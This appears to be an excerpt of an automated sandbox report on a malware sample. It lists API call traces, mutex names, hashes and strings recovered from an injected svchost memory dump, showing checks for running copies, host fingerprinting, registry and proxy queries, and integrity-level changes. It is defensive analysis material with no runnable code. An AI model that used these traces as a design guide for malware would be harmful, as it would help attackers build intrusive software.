                                                                                                                                                                                                                • Opcode ID: 26f9aa116a2c6f1db9500adf69849aaa164e48377c5a0cfafa9ad00c4a2f7daa
                                                                                                                                                                                                                • Instruction ID: 6e5379fd9e14bbcd310906457cba0bb8ce58d7863ce2144634fe176fa982e413
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26f9aa116a2c6f1db9500adf69849aaa164e48377c5a0cfafa9ad00c4a2f7daa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3501D631AC17152AE27157A89C46F9EB398DF44B60F458694FF45A7180AFF0A8004AA5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BD32DC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BD32E5
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD32F9
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD330B
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7752), ref: 02BD3316
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,617D7752,RFK), ref: 02BD3330
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BD3336
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                • String ID: 617D7752$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$RFK
                                                                                                                                                                                                                • API String ID: 4280258085-3409812998
                                                                                                                                                                                                                • Opcode ID: f887a3bd9b3e2728292afedff0f7e02093899a22ed0170c183323295408a360e
                                                                                                                                                                                                                • Instruction ID: 68e7e0de324b0d8174daebddb69492ad5079e3ec8d8274e16fa552f2c5d7fa9e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f887a3bd9b3e2728292afedff0f7e02093899a22ed0170c183323295408a360e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DF0F430AC57006BE26067549C0AF8A77DCAF44B50F808294F79AA3082ABE0A5048FB7
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02BCB91C
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BCB925
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCB939
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BCB94B
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d73f8), ref: 02BCB956
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,617d73f8,ALPHA), ref: 02BCB970
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BCB976
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                • String ID: 617d73f8$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0Wu
                                                                                                                                                                                                                • API String ID: 4280258085-2040853542
                                                                                                                                                                                                                • Opcode ID: 8987d40ec5891cbad1fffafb5284e8260ff0b963e17ddf30d0f65c352f0f7b64
                                                                                                                                                                                                                • Instruction ID: 0c2291289010737751c32083843533006e3f3ca20c2a95795d33d8cde7308a2a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8987d40ec5891cbad1fffafb5284e8260ff0b963e17ddf30d0f65c352f0f7b64
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71F028306C9705ABE6646B648C0BF1E77ACEF04A48F614648F742A31C0C7E0A6109BB6
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 02BCCBAC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BCCBB9
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCCBCD
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BCCBDF
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BCCBEE
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73AC), ref: 02BCCBF5
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,617D73AC,BSS), ref: 02BCCC0F
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BCCC15
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                                • String ID: 617D73AC$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$P0Wu
                                                                                                                                                                                                                • API String ID: 3206501308-1718476822
                                                                                                                                                                                                                • Opcode ID: d143cb26d3c0545a302d72525e0879a53b30abf5850e25ba685288bef5bdcf2f
                                                                                                                                                                                                                • Instruction ID: 07205b8d7a50601f808e01faa52239ce530c8c5afb569f8077eb7667d252589e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d143cb26d3c0545a302d72525e0879a53b30abf5850e25ba685288bef5bdcf2f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55F02B30A89304BFE2716BA49D09F4E7B98AF09F45F10464DFB5AA31C1CBB084148B72
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: free$malloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2190258309-0
                                                                                                                                                                                                                • Opcode ID: 4a15916ac8bc6abc2fe2c6db27c7bf57d77e59468c25e4416f5a0c02237f86a8
                                                                                                                                                                                                                • Instruction ID: 17ab6b3c8d91d0f1395282d63e341f22f7b90562148f0d5d61060ed70478eadd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a15916ac8bc6abc2fe2c6db27c7bf57d77e59468c25e4416f5a0c02237f86a8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C84131B1D416118BC721DFD8E8C0B9AB7A5EB44B14F1B4EB9E44A47608E731A860CFD2
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: c35d695e3bd8e19de5a0471123e2fc32ff4311193cf77c9fc93b21f1187ca94c
                                                                                                                                                                                                                • Instruction ID: 14a43275888d6cb6a7b5411c98b97984546beb866c874734d84ecda34e4a60e3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c35d695e3bd8e19de5a0471123e2fc32ff4311193cf77c9fc93b21f1187ca94c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94C1D471A106169FCB14CF2CC8A4BAB7BB5EF49344B2482C8ED59EB341D731EA05CB90
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2221118986-0
                                                                                                                                                                                                                • Opcode ID: ebdefe0ccf7dca4d477b1ac3c68d8fca596ad1d5551be48629f1ca220201ef3e
                                                                                                                                                                                                                • Instruction ID: 899c3b54fc84715de8db1ab819a65c2972a449072b2a6a59033f0abab28b18a8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebdefe0ccf7dca4d477b1ac3c68d8fca596ad1d5551be48629f1ca220201ef3e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3513FB1D412159ADB50DF94C884AEB7BB9AF08340F0441BAEE0CAF285D7745645CFE1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D098), ref: 02BD3B70
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD3BB1
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD3BBB
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD3BC3
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD3BD4
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD3BDB
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02BD3BE8
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D098,?,02BD3D9C), ref: 02BD3C57
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                                • String ID: keys.zip$path1.txt
                                                                                                                                                                                                                • API String ID: 1373881290-1274251082
                                                                                                                                                                                                                • Opcode ID: 458abd76119522f9249da9a04a44250f75919daf90a7f6d978517eda264d8423
                                                                                                                                                                                                                • Instruction ID: b130c36ab5bc641ae5260634855e32cce1384bdbf5e97494b5fa8f7c66111347
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 458abd76119522f9249da9a04a44250f75919daf90a7f6d978517eda264d8423
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74410B715047454BCB258F3898A4BEABBE5FF56340F0489D4EACAD7301EB71D984CB91
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WindowFromDC.USER32(?), ref: 02BBC31C
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBC354
                                                                                                                                                                                                                • CreateRectRgn.GDI32(00000001,00000001,00000001,00000001), ref: 02BBC362
                                                                                                                                                                                                                • GetClipRgn.GDI32(?,00000000), ref: 02BBC36C
                                                                                                                                                                                                                • SelectClipRgn.GDI32(00000000,00000000), ref: 02BBC37C
                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 02BBC383
                                                                                                                                                                                                                • GetViewportOrgEx.GDI32(?,?), ref: 02BBC38E
                                                                                                                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 02BBC3A2
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BBC3E3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
                                                                                                                                                                                                                • String ID: P0Wu
                                                                                                                                                                                                                • API String ID: 3315380975-465009422
                                                                                                                                                                                                                • Opcode ID: e08055e1d9b8f15b94b1078f0f9eabf9d581e1c3c6ff677bd255dd42d2406790
                                                                                                                                                                                                                • Instruction ID: 4beef16bbd8e3095bc5a758c7a560748fc3b2c91fc9631c2ab5733f262eff743
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e08055e1d9b8f15b94b1078f0f9eabf9d581e1c3c6ff677bd255dd42d2406790
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF41FCB6641105AFCB64CF69DC84EAB77BDEF8C751B508609FA19D3240D670E850CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD5124
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02BD5133
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02BD513A
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD5152
                                                                                                                                                                                                                • GetComputerNameA.KERNEL32(00000000,00000104), ref: 02BD5169
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02BD516F
                                                                                                                                                                                                                  • Part of subcall function 02BC41E0: GetProcessHeap.KERNEL32(00000008,02BD5097,00000000,756934D0,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC41FE
                                                                                                                                                                                                                  • Part of subcall function 02BC41E0: HeapAlloc.KERNEL32(00000000,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4205
                                                                                                                                                                                                                  • Part of subcall function 02BC41E0: memset.MSVCRT ref: 02BC4215
                                                                                                                                                                                                                • GetComputerNameA.KERNEL32(00000000,00000104), ref: 02BD5190
                                                                                                                                                                                                                • StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD51B7
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD51CB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_, xrefs: 02BD5100
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$memset$AllocComputerNameProcess$ErrorLastlstrcpyn
                                                                                                                                                                                                                • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
                                                                                                                                                                                                                • API String ID: 734199406-1705633369
                                                                                                                                                                                                                • Opcode ID: 59407088c45d3f96c12e9dce8df0aec07d858e74a022405fea52fa324c200e17
                                                                                                                                                                                                                • Instruction ID: 0e9cf4be968420a69ab9577f85f06457942fe9f2421a44671ff3d99cab780442
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59407088c45d3f96c12e9dce8df0aec07d858e74a022405fea52fa324c200e17
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73214BB2D00209A7D73196649C44FFFB7BDDFC4751F600599FA45A7140FBB0AA858BA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,7556F380,00000000,00000000,?,?,02BC4E91,?,00000000), ref: 02BB74C6
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB74E4
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: GetProcessHeap.KERNEL32(00000008,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB750D
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: RtlAllocateHeap.NTDLL(00000000,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB7514
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: memset.MSVCRT ref: 02BB7527
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB7553
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB7563
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02BB7572
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BB7585
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB7594
                                                                                                                                                                                                                  • Part of subcall function 02BB74A0: HeapValidate.KERNEL32(00000000), ref: 02BB759B
                                                                                                                                                                                                                • RtlImageNtHeader.NTDLL(00000000), ref: 02BD53BE
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BD53D2
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,02BC56AF), ref: 02BD53E3
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02BD53F3
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02BC56AF), ref: 02BD5430
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,02BC56AF), ref: 02BD5433
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02BC56AF), ref: 02BD5440
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,02BC56AF), ref: 02BD5443
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$Process$Validate$AddressAllocateCountCreateFreeHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                                • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                                • API String ID: 1866686876-3277137149
                                                                                                                                                                                                                • Opcode ID: 5f1ff0a7f5f79077544492c81645d3fb017464aeecada54f94fdc10154486e5f
                                                                                                                                                                                                                • Instruction ID: d306593d33da86453497e9890489daf807d48075d96c7a9859f061b54284835c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f1ff0a7f5f79077544492c81645d3fb017464aeecada54f94fdc10154486e5f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E811B631A812017BD7709B759C08FDB7BADEF84795F848954FA05D3140EB75E610CBA1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BD32DC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BD32E5
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD32F9
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD330B
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7752), ref: 02BD3316
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,617D7752,RFK), ref: 02BD3330
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BD3336
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                • String ID: 617D7752$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$RFK
                                                                                                                                                                                                                • API String ID: 4280258085-3409812998
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC01F4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02BC020C
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC020F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC021C
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC021F
                                                                                                                                                                                                                • InternetQueryOptionA.WININET(?,00000022,00000000,-02BFFAE4), ref: 02BC023C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000014), ref: 02BC0259
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC0260
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC0270
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC02B5
                                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,00000000,?), ref: 02BC02C9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3911349929-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC0071
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?), ref: 02BC008C
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC008F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC009C
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC009F
                                                                                                                                                                                                                • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 02BC00BC
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000014), ref: 02BC00D9
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC00E0
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC00F0
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC0109
                                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,00000000,00000002), ref: 02BC011C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3911349929-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,-057FF5C8,00000000,00000000,?,?,?,?), ref: 02BBF404
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BBF40B
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BBF41B
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 02BBF426
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,00000000,00000000,?,?,02BF56DC,?,02BF5E1C,-057FF5C8,00000000,00000000,?), ref: 02BBF4EE
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BBF4F5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,00000000), ref: 02BBF501
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BBF508
                                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,02BF5E1C,-057FF5C8,00000000,00000000,?), ref: 02BBF52E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,-057FF5C8,00000000,00000000,?,?,?,?), ref: 02BBF55A
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BBF55D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BBF56A
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BBF56D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidatememcpy$Allocmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1948005343-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB7B33
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB7B4B
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,?,?,?,?,?,?,7556F380), ref: 02BB7B6C
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00000104,00000000,00000001,?,00000104,?,?,?,?,?,7556F380), ref: 02BB7B92
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,7556F380), ref: 02BB7C1D
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,7556F380), ref: 02BB7C24
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB7C33
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,7556F380), ref: 02BB7C63
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                • String ID: software\microsoft
                                                                                                                                                                                                                • API String ID: 4158279268-3673152959
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD4297
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D19C,?,?), ref: 02BD4329
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},?,?), ref: 02BD43B5
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},00000006), ref: 02BD43D2
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BD43D9
                                                                                                                                                                                                                  • Part of subcall function 02BB7310: GetHandleInformation.KERNEL32(?,00000000), ref: 02BB7324
                                                                                                                                                                                                                  • Part of subcall function 02BB7310: CloseHandle.KERNEL32(?), ref: 02BB7335
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Security$Descriptor$BackslashHandleMutexPath$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
